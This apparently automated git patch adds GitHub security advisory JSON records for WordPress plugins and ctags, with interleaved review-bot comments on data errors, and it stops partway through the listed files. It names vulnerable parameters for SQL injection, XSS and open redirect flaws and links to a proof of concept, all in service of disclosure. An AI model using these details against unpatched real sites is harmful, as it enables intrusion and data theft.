From 7203f6466f8d054a3b4130f47f2191774069c112 Mon Sep 17 00:00:00 2001 
From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 18 Feb 2026 06:31:37 +0000 Subject: [PATCH 001/174] Advisory Database Sync --- .../GHSA-354p-69pj-7hrh.json | 25 ++++++ .../GHSA-3gjc-g73c-46x5.json | 25 ++++++ .../GHSA-4292-3qv2-cv3v.json | 40 ++++++++++ .../GHSA-43j7-cmcw-j9hr.json | 52 ++++++++++++ .../GHSA-4r69-36rj-xggj.json | 40 ++++++++++ .../GHSA-4wq4-57x2-fmhv.json | 44 ++++++++++ .../GHSA-568p-hhxc-vvx8.json | 29 +++++++ .../GHSA-5g55-5vv7-848g.json | 40 ++++++++++ .../GHSA-69fg-c96p-c6fq.json | 60 ++++++++++++++ .../GHSA-763r-9v7r-f8fj.json | 25 ++++++ .../GHSA-7f6r-mp5f-rh8r.json | 48 +++++++++++ .../GHSA-cpmc-9298-xjhp.json | 48 +++++++++++ .../GHSA-fv33-cj5h-48j8.json | 44 ++++++++++ .../GHSA-fvjg-wx7c-4qc5.json | 48 +++++++++++ .../GHSA-fx3v-rgv7-qq3x.json | 44 ++++++++++ .../GHSA-g4wh-mv47-2hg5.json | 80 +++++++++++++++++++ .../GHSA-g8mp-px4h-fw43.json | 64 +++++++++++++++ .../GHSA-gcff-gvxv-7jgm.json | 52 ++++++++++++ .../GHSA-ghf8-ggp8-97wj.json | 25 ++++++ .../GHSA-h858-mf2m-8jf4.json | 52 ++++++++++++ .../GHSA-jg87-hjf9-gf64.json | 25 ++++++ .../GHSA-m3jj-4hf6-wgch.json | 25 ++++++ .../GHSA-mcrh-3qmp-x37p.json | 44 ++++++++++ .../GHSA-pj33-46c7-rm7p.json | 52 ++++++++++++ .../GHSA-qph2-xm7h-wv73.json | 48 +++++++++++ .../GHSA-qw9p-rfpx-fxh5.json | 40 ++++++++++ .../GHSA-rgq3-q5rc-mjc3.json | 48 +++++++++++ .../GHSA-rj4g-w683-5gq4.json | 48 +++++++++++ .../GHSA-vfcp-69jm-85xv.json | 25 ++++++ .../GHSA-vrm4-h3r4-hh29.json | 25 ++++++ .../GHSA-wpf3-wv8v-2wxj.json | 40 ++++++++++ 31 files changed, 1305 insertions(+) create mode 100644 advisories/unreviewed/2026/02/GHSA-354p-69pj-7hrh/GHSA-354p-69pj-7hrh.json create mode 100644 advisories/unreviewed/2026/02/GHSA-3gjc-g73c-46x5/GHSA-3gjc-g73c-46x5.json create mode 100644 advisories/unreviewed/2026/02/GHSA-4292-3qv2-cv3v/GHSA-4292-3qv2-cv3v.json create mode 100644 advisories/unreviewed/2026/02/GHSA-43j7-cmcw-j9hr/GHSA-43j7-cmcw-j9hr.json create mode 
100644 advisories/unreviewed/2026/02/GHSA-4r69-36rj-xggj/GHSA-4r69-36rj-xggj.json create mode 100644 advisories/unreviewed/2026/02/GHSA-4wq4-57x2-fmhv/GHSA-4wq4-57x2-fmhv.json create mode 100644 advisories/unreviewed/2026/02/GHSA-568p-hhxc-vvx8/GHSA-568p-hhxc-vvx8.json create mode 100644 advisories/unreviewed/2026/02/GHSA-5g55-5vv7-848g/GHSA-5g55-5vv7-848g.json create mode 100644 advisories/unreviewed/2026/02/GHSA-69fg-c96p-c6fq/GHSA-69fg-c96p-c6fq.json create mode 100644 advisories/unreviewed/2026/02/GHSA-763r-9v7r-f8fj/GHSA-763r-9v7r-f8fj.json create mode 100644 advisories/unreviewed/2026/02/GHSA-7f6r-mp5f-rh8r/GHSA-7f6r-mp5f-rh8r.json create mode 100644 advisories/unreviewed/2026/02/GHSA-cpmc-9298-xjhp/GHSA-cpmc-9298-xjhp.json create mode 100644 advisories/unreviewed/2026/02/GHSA-fv33-cj5h-48j8/GHSA-fv33-cj5h-48j8.json create mode 100644 advisories/unreviewed/2026/02/GHSA-fvjg-wx7c-4qc5/GHSA-fvjg-wx7c-4qc5.json create mode 100644 advisories/unreviewed/2026/02/GHSA-fx3v-rgv7-qq3x/GHSA-fx3v-rgv7-qq3x.json create mode 100644 advisories/unreviewed/2026/02/GHSA-g4wh-mv47-2hg5/GHSA-g4wh-mv47-2hg5.json create mode 100644 advisories/unreviewed/2026/02/GHSA-g8mp-px4h-fw43/GHSA-g8mp-px4h-fw43.json create mode 100644 advisories/unreviewed/2026/02/GHSA-gcff-gvxv-7jgm/GHSA-gcff-gvxv-7jgm.json create mode 100644 advisories/unreviewed/2026/02/GHSA-ghf8-ggp8-97wj/GHSA-ghf8-ggp8-97wj.json create mode 100644 advisories/unreviewed/2026/02/GHSA-h858-mf2m-8jf4/GHSA-h858-mf2m-8jf4.json create mode 100644 advisories/unreviewed/2026/02/GHSA-jg87-hjf9-gf64/GHSA-jg87-hjf9-gf64.json create mode 100644 advisories/unreviewed/2026/02/GHSA-m3jj-4hf6-wgch/GHSA-m3jj-4hf6-wgch.json create mode 100644 advisories/unreviewed/2026/02/GHSA-mcrh-3qmp-x37p/GHSA-mcrh-3qmp-x37p.json create mode 100644 advisories/unreviewed/2026/02/GHSA-pj33-46c7-rm7p/GHSA-pj33-46c7-rm7p.json create mode 100644 advisories/unreviewed/2026/02/GHSA-qph2-xm7h-wv73/GHSA-qph2-xm7h-wv73.json create mode 100644 
advisories/unreviewed/2026/02/GHSA-qw9p-rfpx-fxh5/GHSA-qw9p-rfpx-fxh5.json create mode 100644 advisories/unreviewed/2026/02/GHSA-rgq3-q5rc-mjc3/GHSA-rgq3-q5rc-mjc3.json create mode 100644 advisories/unreviewed/2026/02/GHSA-rj4g-w683-5gq4/GHSA-rj4g-w683-5gq4.json create mode 100644 advisories/unreviewed/2026/02/GHSA-vfcp-69jm-85xv/GHSA-vfcp-69jm-85xv.json create mode 100644 advisories/unreviewed/2026/02/GHSA-vrm4-h3r4-hh29/GHSA-vrm4-h3r4-hh29.json create mode 100644 advisories/unreviewed/2026/02/GHSA-wpf3-wv8v-2wxj/GHSA-wpf3-wv8v-2wxj.json
diff --git a/advisories/unreviewed/2026/02/GHSA-354p-69pj-7hrh/GHSA-354p-69pj-7hrh.json b/advisories/unreviewed/2026/02/GHSA-354p-69pj-7hrh/GHSA-354p-69pj-7hrh.json
new file mode 100644
index 0000000000000..2f5abda6b669e
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-354p-69pj-7hrh/GHSA-354p-69pj-7hrh.json
@@ -0,0 +1,25 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-354p-69pj-7hrh",
+ "modified": "2026-02-18T06:30:18Z",
+ "published": "2026-02-18T06:30:18Z",
+ "aliases": [
+ "CVE-2026-27038"
+ ],
+ "details": "Rejected reason: Not used",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27038"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T04:16:01Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-3gjc-g73c-46x5/GHSA-3gjc-g73c-46x5.json b/advisories/unreviewed/2026/02/GHSA-3gjc-g73c-46x5/GHSA-3gjc-g73c-46x5.json
new file mode 100644
index 0000000000000..6ea96b837d889
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-3gjc-g73c-46x5/GHSA-3gjc-g73c-46x5.json
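Review bot: GHSA-354p-69pj-7hrh is added as a live advisory although its only content is `"details": "Rejected reason: Not used"`, and the record carries no `withdrawn` timestamp. Consumers that count or alert on every entry in this feed will treat the rejected CVE-2026-27038 as an open advisory. Setting a `withdrawn` field, or skipping rejected CVEs at import, would let them filter it out. The same applies to GHSA-3gjc-g73c-46x5 and GHSA-763r-9v7r-f8fj later in this patch.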
@@ -0,0 +1,25 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-3gjc-g73c-46x5",
+ "modified": "2026-02-18T06:30:18Z",
+ "published": "2026-02-18T06:30:18Z",
+ "aliases": [
+ "CVE-2026-27036"
+ ],
+ "details": "Rejected reason: Not used",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27036"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T04:16:01Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-4292-3qv2-cv3v/GHSA-4292-3qv2-cv3v.json b/advisories/unreviewed/2026/02/GHSA-4292-3qv2-cv3v/GHSA-4292-3qv2-cv3v.json
new file mode 100644
index 0000000000000..f6c829558b061
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-4292-3qv2-cv3v/GHSA-4292-3qv2-cv3v.json
@@ -0,0 +1,40 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-4292-3qv2-cv3v",
+ "modified": "2026-02-18T06:30:19Z",
+ "published": "2026-02-18T06:30:19Z",
+ "aliases": [
+ "CVE-2025-12037"
+ ],
+ "details": "The WP 404 Auto Redirect to Similar Post plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.0.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-12037"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/log/wp-404-auto-redirect-to-similar-post"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/c20059de-9d81-4318-a015-8e402945828c?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T05:16:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-43j7-cmcw-j9hr/GHSA-43j7-cmcw-j9hr.json b/advisories/unreviewed/2026/02/GHSA-43j7-cmcw-j9hr/GHSA-43j7-cmcw-j9hr.json
new file mode 100644
index 0000000000000..b5371d7d0af4b
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-43j7-cmcw-j9hr/GHSA-43j7-cmcw-j9hr.json
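Review bot: `"affected": []` leaves GHSA-4292-3qv2-cv3v with no machine-readable package or version range, even though the details text names the plugin and the upper bound 1.0.5. Tools that match advisories to installed components through `affected` will not alert on this record, so the version bound has to be read from `details` by hand. Every other advisory added in this patch has the same empty `affected` array. That may be expected for unreviewed imports, but consumers should not read an empty list as "nothing affected".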
@@ -0,0 +1,52 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-43j7-cmcw-j9hr",
+ "modified": "2026-02-18T06:30:18Z",
+ "published": "2026-02-18T06:30:18Z",
+ "aliases": [
+ "CVE-2025-12074"
+ ],
+ "details": "The Context Blog theme for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.2.5 via the 'context_blog_modal_popup' due to insufficient restrictions on which posts can be included. This makes it possible for unauthenticated attackers to extract data from password protected, private, or draft posts that they should not have access to.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-12074"
+ },
+ {
+ "type": "WEB",
+ "url": "https://themes.svn.wordpress.org/context-blog/1.2.1/inc/ajax/modal-popup.php"
+ },
+ {
+ "type": "WEB",
+ "url": "https://themes.trac.wordpress.org/changeset/297968"
+ },
+ {
+ "type": "WEB",
+ "url": "https://wordpress.org/themes/context-blog"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.postmagthemes.com/downloads/context-blog-free-wordpress-theme"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/25552fdb-c55b-4390-a614-7c007c5fe7b1?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-200"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T05:16:16Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-4r69-36rj-xggj/GHSA-4r69-36rj-xggj.json b/advisories/unreviewed/2026/02/GHSA-4r69-36rj-xggj/GHSA-4r69-36rj-xggj.json
new file mode 100644
index 0000000000000..e24a813ced989
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-4r69-36rj-xggj/GHSA-4r69-36rj-xggj.json
@@ -0,0 +1,40 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-4r69-36rj-xggj",
+ "modified": "2026-02-18T06:30:19Z",
+ "published": "2026-02-18T06:30:19Z",
+ "aliases": [
+ "CVE-2025-11737"
+ ],
+ "details": "The VK All in One Expansion Unit plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'vkExUnit_sns_title' parameter in all versions up to, and including, 9.112.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-11737"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3402996%40vk-all-in-one-expansion-unit&new=3402996%40vk-all-in-one-expansion-unit&sfp_email=&sfph_mail="
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/1e7efb39-fada-4167-825c-21cc31948a63?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T06:16:31Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-4wq4-57x2-fmhv/GHSA-4wq4-57x2-fmhv.json b/advisories/unreviewed/2026/02/GHSA-4wq4-57x2-fmhv/GHSA-4wq4-57x2-fmhv.json
new file mode 100644
index 0000000000000..e9956057d08ba
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-4wq4-57x2-fmhv/GHSA-4wq4-57x2-fmhv.json
@@ -0,0 +1,44 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-4wq4-57x2-fmhv",
+ "modified": "2026-02-18T06:30:19Z",
+ "published": "2026-02-18T06:30:19Z",
+ "aliases": [
+ "CVE-2025-6460"
+ ],
+ "details": "The Display During Conditional Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘message’ parameter in all versions up to, and including, 1.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-6460"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset/3455051"
+ },
+ {
+ "type": "WEB",
+ "url": "https://wordpress.org/plugins/display-during-conditional-shortcode/#developers"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/ad39a3b0-5434-4595-a052-4b6e4adb2247?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T05:16:18Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-568p-hhxc-vvx8/GHSA-568p-hhxc-vvx8.json b/advisories/unreviewed/2026/02/GHSA-568p-hhxc-vvx8/GHSA-568p-hhxc-vvx8.json
new file mode 100644
index 0000000000000..85d2b669e2761
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-568p-hhxc-vvx8/GHSA-568p-hhxc-vvx8.json
@@ -0,0 +1,29 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-568p-hhxc-vvx8",
+ "modified": "2026-02-18T06:30:19Z",
+ "published": "2026-02-18T06:30:19Z",
+ "aliases": [
+ "CVE-2026-1368"
+ ],
+ "details": "The Video Conferencing with Zoom WordPress plugin before 4.6.6 contains an AJAX handler that has its nonce verification commented out, allowing unauthenticated attackers to generate valid Zoom SDK signatures for any meeting ID and retrieve the site's Zoom SDK key.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1368"
+ },
+ {
+ "type": "WEB",
+ "url": "https://wpscan.com/vulnerability/218e6655-c5aa-4bce-86b2-cad3bb20020c"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T06:16:34Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-5g55-5vv7-848g/GHSA-5g55-5vv7-848g.json b/advisories/unreviewed/2026/02/GHSA-5g55-5vv7-848g/GHSA-5g55-5vv7-848g.json
new file mode 100644
index 0000000000000..b32d5ce03dc02
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-5g55-5vv7-848g/GHSA-5g55-5vv7-848g.json
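Review bot: GHSA-568p-hhxc-vvx8 carries `"severity": []`, `"cwe_ids": []` and `"severity": null` although its details describe an unauthenticated path to the site's Zoom SDK key and to valid SDK signatures for any meeting ID. Filters that rank or suppress by severity should treat the null here as "unscored", not as low. Presumably the upstream record had no CVSS vector or CWE at import time, so the entry needs a re-sync once one is assigned. Until then the only triage data is the prose, which gives 4.6.6 as the fixed version.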
@@ -0,0 +1,40 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-5g55-5vv7-848g",
+ "modified": "2026-02-18T06:30:19Z",
+ "published": "2026-02-18T06:30:19Z",
+ "aliases": [
+ "CVE-2025-12122"
+ ],
+ "details": "The Popup Box – Easily Create WordPress Popups plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'iframeBox' shortcode in all versions up to, and including, 3.2.12 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-12122"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3410472%40popup-box&new=3410472%40popup-box&sfp_email=&sfph_mail="
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/a7eeb557-0528-422a-aae7-3f99154953df?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-78"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T06:16:33Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-69fg-c96p-c6fq/GHSA-69fg-c96p-c6fq.json b/advisories/unreviewed/2026/02/GHSA-69fg-c96p-c6fq/GHSA-69fg-c96p-c6fq.json
new file mode 100644
index 0000000000000..d246f61aed11a
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-69fg-c96p-c6fq/GHSA-69fg-c96p-c6fq.json
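Review bot: `"cwe_ids": ["CWE-78"]` in GHSA-5g55-5vv7-848g contradicts the details, which describe Stored Cross-Site Scripting through the 'iframeBox' shortcode; CWE-78 is OS command injection. The other stored-XSS records in this patch use `"CWE-79"`, and the CVSS vector here (`S:C/C:L/I:L/A:N`) matches theirs, so the value should read `"CWE-79"`. The wrong ID most likely comes from the upstream record and is best corrected there. Until it is, weakness-class filters and dashboards will file this advisory under command injection.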
@@ -0,0 +1,60 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-69fg-c96p-c6fq",
+ "modified": "2026-02-18T06:30:19Z",
+ "published": "2026-02-18T06:30:19Z",
+ "aliases": [
+ "CVE-2026-2641"
+ ],
+ "details": "A weakness has been identified in universal-ctags ctags up to 6.2.1. The affected element is the function parseExpression/parseExprList of the file parsers/v.c of the component V Language Parser. Executing a manipulation can lead to uncontrolled recursion. It is possible to launch the attack on the local host. The exploit has been made available to the public and could be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2641"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/universal-ctags/ctags/issues/4369"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/oneafter/0116/blob/main/poc.v"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/universal-ctags/ctags"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.346397"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.346397"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.752768"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-404"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T06:16:35Z"
+ }
+}
\ No newline at end of file
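Review bot: `"cwe_ids": ["CWE-404"]` in GHSA-69fg-c96p-c6fq is broader than the defect in the details, which is uncontrolled recursion in parseExpression/parseExprList of parsers/v.c; CWE-674 (Uncontrolled Recursion) is the specific class. The details also say the project has not yet responded, and `affected` is empty, so the only version information is "up to 6.2.1" in prose and no fixed release is named. Until one is, a reasonable defensive reading is that ctags runs over untrusted V source should be resource-limited and isolated from long-lived processes.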
diff --git a/advisories/unreviewed/2026/02/GHSA-763r-9v7r-f8fj/GHSA-763r-9v7r-f8fj.json b/advisories/unreviewed/2026/02/GHSA-763r-9v7r-f8fj/GHSA-763r-9v7r-f8fj.json
new file mode 100644
index 0000000000000..778e6419c3092
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-763r-9v7r-f8fj/GHSA-763r-9v7r-f8fj.json
@@ -0,0 +1,25 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-763r-9v7r-f8fj",
+ "modified": "2026-02-18T06:30:18Z",
+ "published": "2026-02-18T06:30:18Z",
+ "aliases": [
+ "CVE-2026-27032"
+ ],
+ "details": "Rejected reason: Not used",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27032"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T04:16:00Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-7f6r-mp5f-rh8r/GHSA-7f6r-mp5f-rh8r.json b/advisories/unreviewed/2026/02/GHSA-7f6r-mp5f-rh8r/GHSA-7f6r-mp5f-rh8r.json
new file mode 100644
index 0000000000000..7f10555e9287f
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-7f6r-mp5f-rh8r/GHSA-7f6r-mp5f-rh8r.json
@@ -0,0 +1,48 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-7f6r-mp5f-rh8r",
+ "modified": "2026-02-18T06:30:19Z",
+ "published": "2026-02-18T06:30:19Z",
+ "aliases": [
+ "CVE-2026-1639"
+ ],
+ "details": "The Taskbuilder – WordPress Project Management & Task Management plugin for WordPress is vulnerable to time-based blind SQL Injection via the 'order' and 'sort_by' parameters in all versions up to, and including, 5.0.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1639"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/taskbuilder/tags/5.0.2/includes/admin/projects/projects_list.php#L136"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/taskbuilder/tags/5.0.2/includes/admin/projects/projects_list.php#L138"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/taskbuilder/tags/5.0.2/includes/admin/projects/projects_list.php#L14"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/2cfdde5c-f0e3-4597-9789-3ff0347719c6?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-89"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T06:16:34Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-cpmc-9298-xjhp/GHSA-cpmc-9298-xjhp.json b/advisories/unreviewed/2026/02/GHSA-cpmc-9298-xjhp/GHSA-cpmc-9298-xjhp.json
new file mode 100644
index 0000000000000..24f4fe3bfb7e8
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-cpmc-9298-xjhp/GHSA-cpmc-9298-xjhp.json
@@ -0,0 +1,48 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-cpmc-9298-xjhp",
+ "modified": "2026-02-18T06:30:19Z",
+ "published": "2026-02-18T06:30:19Z",
+ "aliases": [
+ "CVE-2026-1296"
+ ],
+ "details": "The Frontend Post Submission Manager Lite plugin for WordPress is vulnerable to Open Redirection in all versions up to, and including, 1.2.7 due to insufficient validation on the 'requested_page' POST parameter in the verify_username_password function. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action such as clicking on a link.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1296"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/frontend-post-submission-manager-lite/tags/1.2.6/includes/classes/class-fpsml-shortcode.php#L108"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/frontend-post-submission-manager-lite/trunk/includes/classes/class-fpsml-shortcode.php#L108"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3458652%40frontend-post-submission-manager-lite&new=3458652%40frontend-post-submission-manager-lite&sfp_email=&sfph_mail="
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/92c52129-7cf5-4a1b-80a1-b01140e6a72b?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-601"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T05:16:25Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-fv33-cj5h-48j8/GHSA-fv33-cj5h-48j8.json b/advisories/unreviewed/2026/02/GHSA-fv33-cj5h-48j8/GHSA-fv33-cj5h-48j8.json
